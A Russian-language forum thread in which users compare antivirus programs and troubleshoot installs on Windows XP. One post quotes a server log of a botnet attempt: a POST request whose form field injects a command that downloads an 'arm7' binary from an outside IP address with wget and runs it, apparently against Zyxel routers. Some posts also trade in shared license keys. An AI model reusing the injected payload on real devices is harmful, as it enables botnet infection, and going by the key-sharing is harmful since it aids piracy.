Антивирус в2017

Я для себя давно выбрал НОД и не жалею. Скачал бесплатно, ключики в интернете можно каждый месяц скачивать и обновлять базу. Удобный, быстрый и не затормаживает ничего. **********, как по мне, и рядом не валялся.
 
Я Каспера до сих пор юзаю по привычке официала...
Только не пинайте за то шо ***скали, лучше подскажите варианты адекватные.
Для домашки на хрюху...
 
Самый, лутший антивирус это kasperskiy!
 
лучших антивирусов в природе не существует у меня на данный момент стоит ********* Internet Security меня вполне устраивает. :) до этого нод32 стоял тоже не чё так.
 
Avast отлично себя зарекомендовал в последнее время
 
2019 год на дворе, а вы всё еще в антивирусы верите. Я им уже лет 5 не пользуюсь, никаких проблем.
 
сбросьте пож. в личку ключи для нод 32 антивирус 4.
на работе стоит. в инете не могу найти. спс.
 
Nod32 - что есть антивирус что нету.
 
Немножко не в тему, но..
Ситуация такая: для себя на ноутбуке поднял веб-сервер на основе древней и простой программки Small HTTP server от Макса Феоктистова.
Периодически на сервер лезет кто-то, пытаясь залить на сервер свой файл, а потом прочитать его.
Вот лог:
PHP:
!->04/09 18:10:38 [83.239.186.54] (t3 444)
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Ankit
Content-Length: 176
Content-Type: application/x-www-form-urlencoded

 remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+https://142.11.217.116/arm7;chmod+777+arm7;./arm7+zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
^!!
!->04/09 18:10:38 [83.239.186.54] (t3 445)
\cgi-bin\ViewLog.asp
Error. File not found.
Запросы идут с разных адресов.
Я правильно понимаю, что это какой-то ботнет пытается приобщить мой сервер к своему весёлому сообществу?
Судя по словам "зухель" и "арм7", ботнет пытается использовать какую-то известную уязвимость роутеров Зухель.
При попытке перейти по адресу
Тільки зареєстровані користувачі бачать весь контент у цьому розділі
, указанному в логе, Аваст ругается на IoT Botnet attack.
 
Специфический вопрос: какой бесплатный антивирь поставить на старенький ноут под Windows XP sp3 ???
(апдейт до Win7, Win10 не предлагать: не получится по разным причинам).

"**********" и "ДрВеб" не предлагать по идеологическим соображениям.
Аваст был замечен в скандале со слежкой за действиями юзеров и продажей разной чувствительной инфы налево.
AVG делается той же конторой, что и Аваст, поэтому его тоже не хочется.
Авира, Комодо и БитДефендер не хотят устанавливаться под WinXP.
 
Аваст стоит.
 
Я прочитал на Virus Bulletin резхультаты тестирования. Увы, Зілля обнаружил не все вирусы из их коллекции, а также наблюдались сбои в работе.
Тільки зареєстровані користувачі бачать весь контент у цьому розділі


Про этот китайский продукт есть информация, что он так же, как и Аваст, ворует пользовательские данные.
Тільки зареєстровані користувачі бачать весь контент у цьому розділі
 
В конце концов я поставил бесплатный антивирус Panda Dome.
На ВирусБюлетень у него результаты тестирования вроде неплохие. В каких-то скандалах он не замечен.
Установился без проблем, работает. Систему не пригружает. Браузеры не тупят, как ранее с Авастом. При установке я отказался от инсталляции какого-то плагина в браузеры, который якобы что-то там помогает с онлайн шоппингом. Ибо нефиг ему лезть в мои финансовые дела.
Кстати, мне понравилась одна из функций в Панде - "Монитор процессов". Показывает какие процессы запущены, какие лезут в Интернет и куда конкретно они лезут или откуда запросы получают.

Впрочем, не всё так гладко с Пандой на старых компах. На работе на стареньком "Пентиум 4" с виндой XP sp3 и 1 ГБ ОЗУ установщик Панды долго тупил, потом стал ругаться на отсутствие "дот нет фреймворк". Ладно, скачал ему самый свежий фреймворк, который понимает ВинХР. Потом оказалось, что установщик не может скачать нужные ему файлы. Почему-то он не хочет работать с нашим прокси-сервером. У нас инет раздаётся через комп, где запущено соединение VPN, и работает http прокси-сервер "3proxy". Странно. Все браузеры и даже клиент Дропбокс нормально работают с "3proxy", а антивирусы что-то отказываются. Ни Аваст, ни Панда не хотят.
 
UPD: недолго Панда проработала :(
Пару дней назад периодически стало выскакивать системное сообщение, что программа PSUHost.exe (или как-то там, но файлик принадлежит Панде) обратилась к не тому участку памяти, вызвала ошибку и будет закрыта. При этом Панда вроде как продолжала работать. Но вчера, уже точно не помню при каких обстоятельствах, возник "синий экран смерти", где толком ничего не понятно. После перезагрузки "синий экран" появлялся вновь. Проверка ОЗУ битых байтов не нашла.
После перезагрузки в Safe Mode и удаления Панды комп заработал нормально.


На днях попробую переустановить Панду. Если симптомы повторятся, то придётся "Панду - геть!"
 
Я знаю, что очень поздно, чтобы ответить на эту тему. Тем не менее, поиск подходящего антивируса - это бесконечное путешествие. Однако я недавно зарегистрировался на Avg-антивирусе. Сначала я был пользователем Avast, но после прочтения этого (сравнение avast и avg) я принял решение.
 
Назад
Зверху Знизу